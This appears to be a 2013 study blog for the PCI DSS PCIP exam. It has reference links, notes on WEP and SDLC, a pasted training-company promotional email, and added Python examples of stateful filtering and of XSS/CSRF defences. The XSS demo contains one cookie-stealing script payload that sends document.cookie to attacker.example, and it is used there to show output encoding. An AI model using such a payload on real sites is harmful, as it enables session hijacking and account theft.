Saturday, September 21, 2013

Study Material - Some web explanations

Sometimes it helps to get a second explanation or description of things.  Here are some:

Requirements 1.1.3, 1.3.1, 1.3.2, 1.3.4  DMZ
http://searchsecurity.techtarget.com/definition/DMZ

Requirement 1.3.6  Stateful Inspection
http://kb.kerio.com/product/kerio-control/firewall-packet-filtering/what-is-stateful-packet-inspection-429.html
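An added example (not from the original post or from the linked Kerio article) of what stateful inspection buys you over a plain packet filter. A stateless ACL can only look at each packet in isolation, so the usual way to "allow replies" is to permit any inbound packet with the ACK bit set; a stateful filter remembers which connections an inside host opened and admits only packets that belong to one. The trace, the 10.0.0.0/8 internal range and the addresses below are constructed for the example:

```python
"""Minimal stateful TCP packet filter, contrasted with a stateless ACL."""
import ipaddress
from dataclasses import dataclass

# Assumed topology (constructed for this example): 10.0.0.0/8 is the
# protected internal network; everything else is outside.
INTERNAL = ipaddress.ip_network("10.0.0.0/8")


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset  # simplified TCP flags, e.g. frozenset({"SYN", "ACK"})


def is_internal(addr):
    return ipaddress.ip_address(addr) in INTERNAL


def stateless_decision(p):
    """Classic packet filter ('permit tcp any any established' style):
    outbound is allowed; inbound is allowed whenever ACK is set, because
    the filter has no way to know whether a connection really exists."""
    if is_internal(p.src) and not is_internal(p.dst):
        return "ALLOW"
    if "ACK" in p.flags:
        return "ALLOW"  # an ACK scan or a spoofed "reply" sails through
    return "DROP"


class StatefulFilter:
    """Tracks connections by 4-tuple; an inbound packet is allowed only
    when it matches a connection that an internal host initiated."""

    def __init__(self):
        self.table = {}  # initiator's (src, sport, dst, dport) -> state

    def decision(self, p):
        fwd = (p.src, p.sport, p.dst, p.dport)
        rev = (p.dst, p.dport, p.src, p.sport)
        if is_internal(p.src) and not is_internal(p.dst):      # outbound
            if p.flags == frozenset({"SYN"}):
                self.table[fwd] = "SYN_SENT"                   # new connection
                return "ALLOW"
            if fwd in self.table:
                if "RST" in p.flags:
                    del self.table[fwd]
                return "ALLOW"
            return "DROP"  # outbound packet for a connection never seen
        if not is_internal(p.src) and is_internal(p.dst):      # inbound
            state = self.table.get(rev)
            if state is None:
                return "DROP"  # unsolicited: SYN scans and ACK scans alike
            if "RST" in p.flags:
                del self.table[rev]  # reply context is gone after a reset
                return "ALLOW"
            if state == "SYN_SENT" and p.flags == frozenset({"SYN", "ACK"}):
                self.table[rev] = "ESTABLISHED"
                return "ALLOW"
            if state == "ESTABLISHED" and "ACK" in p.flags:
                return "ALLOW"
            return "DROP"
        return "DROP"  # traffic not crossing the boundary is not our job


def sample_trace():
    """Constructed trace: one legitimate HTTPS session from an internal
    host, then an external scanner probing 10.0.0.5:22 with a SYN and
    with a bare ACK, then the server resetting the HTTPS session."""
    S = frozenset
    return [
        Packet("10.0.0.5", 40000, "203.0.113.10", 443, S({"SYN"})),
        Packet("203.0.113.10", 443, "10.0.0.5", 40000, S({"SYN", "ACK"})),
        Packet("10.0.0.5", 40000, "203.0.113.10", 443, S({"ACK"})),
        Packet("203.0.113.10", 443, "10.0.0.5", 40000, S({"ACK"})),   # data
        Packet("198.51.100.7", 1234, "10.0.0.5", 22, S({"SYN"})),      # SYN scan
        Packet("198.51.100.7", 1234, "10.0.0.5", 22, S({"ACK"})),      # ACK scan
        Packet("203.0.113.10", 443, "10.0.0.5", 40000, S({"RST", "ACK"})),
        Packet("203.0.113.10", 443, "10.0.0.5", 40000, S({"ACK"})),   # after reset
    ]


def run_trace(trace=None):
    """Return a (stateless, stateful) verdict for every packet in order."""
    trace = sample_trace() if trace is None else trace
    fw = StatefulFilter()
    return [(stateless_decision(p), fw.decision(p)) for p in trace]


if __name__ == "__main__":
    for p, (sl, sf) in zip(sample_trace(), run_trace()):
        print(f"{p.src}:{p.sport} -> {p.dst}:{p.dport} {sorted(p.flags)}"
              f"  stateless={sl}  stateful={sf}")
```

Packet 6 is the classic ACK scan: the stateless rule lets it through, while the stateful filter drops it because no inside host ever opened that connection. Packet 8 shows the other half of the job: once the connection is reset the state entry is removed, so later packets for that 4-tuple are no longer trusted either.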

Requirement 1.3.8  Network Address Translation (NAT)
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_q_and_a_item09186a00800e523b.shtml

Requirement 1.3.8  Proxy Servers
http://whatismyipaddress.com/proxy-server

Requirement 2.1, 2.1.1  Simple Network Management Protocol (SNMP)
http://compnetworking.about.com/od/networkprotocols/g/snmp-management-protocol.htm

Requirement 2.1.1  Wired Equivalent Privacy (WEP)
Note:  WEP is not secure and must not be used. It encrypts with RC4 under a static key and a 24-bit IV, and the key can be recovered from captured traffic in minutes; PCI DSS has prohibited WEP as a security control since 30 June 2010, so any WEP network in or connected to the cardholder data environment is a finding, not a risk to weigh.

http://searchsecurity.techtarget.com/definition/Wired-Equivalent-Privacy

Requirement 2.1.1 Wi-Fi Protected Access version 2 (WPA2)
http://www.computerworld.com/s/article/9002706/Tutorial_How_to_set_up_WPA2_on_your_wireless_network_

Requirement 2.2  Industry accepted standard organizations

Center for Internet Security (CIS)
http://www.cisecurity.org/

International Organization for Standardization (ISO)
http://www.iso.org/iso/home.html

SysAdmin, Audit, Network, Security (SANS) Institute
http://www.sans.org/

National Institute of Standards and Technology (NIST)
http://www.nist.gov/

Requirement 2.2.1  Domain Name System (DNS)
http://www.howstuffworks.com/dns.htm

Requirement 2.2  Secure Shell (SSH)
https://kimmo.suominen.com/docs/ssh/

Requirement 2.2  SSH File Transfer Protocol (SFTP)
Note:  SFTP runs inside an SSH session and is unrelated to FTPS (FTP over SSL/TLS); both get called "secure FTP", so check which one a system actually uses.

http://kb.iu.edu/data/akqg.html

Requirement 2.2  Secure Sockets Layer (SSL) and its successor, Transport Layer Security (TLS)
https://www.ssllabs.com/projects/rating-guide/

Requirement 2.2  IP Security (IPsec)
http://www.cisco.com/en/US/tech/tk583/tk372/technologies_tech_note09186a0080094203.shtml#intro

Requirement 6.5.7  Cross Site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

Requirement 6.5.9  Cross Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
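An added example (not from the original post or from the OWASP pages above) covering both of the Requirement 6.5 items listed here: for XSS, the same user comment rendered with and without HTML output encoding; for CSRF, a synchronizer token that is HMAC-bound to the user's session and checked in constant time before a state-changing request is honoured. The function names, session IDs and attacker payload are constructed for the example; SERVER_SECRET is generated at import time only so that the script runs stand-alone.

```python
"""XSS output encoding and CSRF synchronizer tokens, standard library only."""
import hashlib
import hmac
import html
import secrets

# --- Requirement 6.5.7, cross-site scripting ---------------------------
# Both renderers build the same HTML fragment; only the second treats the
# comment as data rather than as markup.


def render_comment_vulnerable(comment):
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    # html.escape encodes < > & " ' so the browser cannot parse user text as tags
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


# --- Requirement 6.5.9, cross-site request forgery ----------------------
# Synchronizer token = nonce . HMAC(secret, session_id:nonce). Because the
# MAC covers the session ID, a token minted for one session fails for any
# other, and an attacker's page cannot read the victim's token anyway.
# Assumption: in production the secret is loaded from configuration and
# persisted; it is generated here only so the example runs on its own.
SERVER_SECRET = secrets.token_bytes(32)


def _mac(session_id, nonce):
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id):
    """Embed the result in a hidden form field when rendering the form."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def verify_csrf_token(session_id, token):
    """Constant-time check that the token was minted for this session."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    return hmac.compare_digest(mac, _mac(session_id, nonce))


def handle_transfer(form, session_id):
    """A state-changing POST handler; `form` is the parsed request body.
    The session ID comes from the authenticated cookie, the token from
    the form: a forged cross-site POST carries the cookie but not the token."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    payload = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
    print(render_comment_vulnerable(payload))
    print(render_comment_safe(payload))
    sid = "victim-session-1"
    tok = issue_csrf_token(sid)
    print(handle_transfer({"to": "attacker", "amount": "1000"}, sid))  # forged, no token
    print(handle_transfer({"to": "rent", "amount": "900", "csrf_token": tok}, sid))
```

The two defences address different trust problems: output encoding stops the victim's browser from interpreting attacker-supplied data as markup, while the token stops an attacker-controlled page from driving the victim's authenticated browser, because that page cannot read the token out of the victim's form. A token that is checked but not tied to the session, or compared with `==` instead of a constant-time comparison, is a common way to get this wrong.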

Requirement 12.3.2  Token
http://searchsecurity.techtarget.com/definition/security-token



Tuesday, September 17, 2013

Study Material - SDLC

The Systems Development Life Cycle (SDLC) is a commonly used methodology for building applications and systems.

The SDLC phases vary depending on who you talk to, but they usually involve most of the same steps: initiation/planning, analysis, design, development/test, implementation, and maintenance/support.

PCI DSS Requirement 6.3 addresses secure application development, commonly called a secure SDLC ("S-SDLC"): it requires information security to be incorporated throughout the life cycle, which in practice means security requirements at planning, threat modeling at design, secure coding and code review during development, security testing before release, and patching during maintenance, rather than a single security review at the end.

Microsoft has some useful material on this showing how security activities map onto each phase of software development [HERE]

Thursday, August 15, 2013

Study Material - Cisco Perspective

Cisco has developed products to assist with PCI Compliance.  They've clearly jumped on the bandwagon.

Here is a good one-page visual on "network segmentation"

And another one on mapping Cisco products to PCI Wireless Compliance




Monday, August 12, 2013

Study Questions - A quick, simple test

Here is a simple 10 question security quiz.

When done, it will provide you with a score and explain the correct answers.

You can find it [HERE]

Thursday, July 18, 2013

Study Material - SSL

Symantec published a free 8-page guide to SSL called the BEGINNER'S GUIDE TO SSL CERTIFICATES.

To access it you will need to enter your contact info; here is the [LINK]

Obviously there will be some company marketing included, but there is substantial general information as well.

Wednesday, July 10, 2013

Study Material - Hmmm. Never thought about RATs

Actually, I've never thought about "sextortion" either.

Hell, I would have never guessed that such a thing existed.

Regardless of what I think, here's an article on remote-access tools (RATs), "camjacking" and "sextortion".

I'm wondering if the exam will have this level of breadth, although Security+ does address RATs.

Study Material: Free Security (and other) Training

I just received this email today.

I signed up and started some Security+ training.

Although this is not directly related to PCIP, the security concepts would provide a lot of value.

Finally, I should note that I am in no way affiliated with this organization and it provides no value to me whether you use them or not.




1-800-418-6789 | United Kingdom: (0) 20 8816 8036
International: +1 813-769-0920

Same LearnSmart Training. Now Free.

Everything you've become accustomed to with IT and Certification Training has changed! You no longer have to spend thousands to understand the latest technologies or get a leg up on your career. Today marks a new era in how you get training. Starting today, LearnSmart training is now FREE.
Hundreds of hours of IT and Career skills training are now at your fingertips along with the most talked about learning management system in the industry - all for FREE.
Get FREE access to LearnSmart including:
·   Vibrant and complete training courses
·   The most respected and accomplished instructors
·   The widest variety of e-Learning media and courseware
·   Five-star customer support
·   No commitment and no charges or fees
Don’t just try us out... take advantage of us. This isn’t a trial or a demo, we’re handing you the keys. Welcome to the family, come on in and put your feet up. Get the training you need... for Free. The world of IT training has changed. Get the same LearnSmart training, now for Free.

Classroom in the Cloud

LearnSmart is the first LMS of its kind that’s designed to go where you go, and to be compatible with all of your mobile devices. Of course you can sit at a desk (or your kitchen table) and train on your laptop, but that’s so 2002. With the LearnSmart Theater you can train in your favorite coffeehouse on your tablet or on the bus with your smartphone. If you’re really committed you can even train at a long red light! (Be careful!) With LearnSmart, your training is truly portable, allowing you to make the most of your time – wherever you spend it.
LearnSmart Video Training is 100% cloud-based training, so you know the content is always up to date and you can use it anywhere. Each course is brought to you by industry experts who know the facts and the practical application of your course better than anyone. Learning is simple, fast and fun with the LearnSmart Theater. It's easy to navigate, fully featured and comes complete with supplemental training options you'll find nowhere else.

Your Info, Your Schedule

Taking notes is one of the most effective ways of retaining information. The LearnSmart system allows students to keep track of key facts in a virtual notebook. Users can sort their notes by course, or by date, making it simpler to review the material before taking their final exam. The My Notes section is also a good spot to help you keep track of the courses you’re taking – including dates of certification exams, etc.
While your notes are, of course, your personal take on the material presented, they can also be a helpful teaching aid for your fellow students. By presenting your unique version of the coursework – and flipping through another pupil’s rendition of the same – you get an extra opportunity to catch what you might have missed, and to look at things in a new way. Since not everyone takes away the same benefit or key information from a lesson, it can go a long way toward improving your understanding when you and a study buddy are able to compare notes.

Connect With Us

Remember to follow our blog and connect with us on your favorite social networks to stay up-to-date with eLearning, IT and Certification Testing, and technology news in general.

Enterprise Training from LearnSmart

To discuss training solutions for your organization, please contact a LearnSmart representative at 1-800-418-6789.

1300 N. Westshore Blvd. Ste 125 | Tampa, FL 33607 | © 2013 LearnSmart | All rights reserved.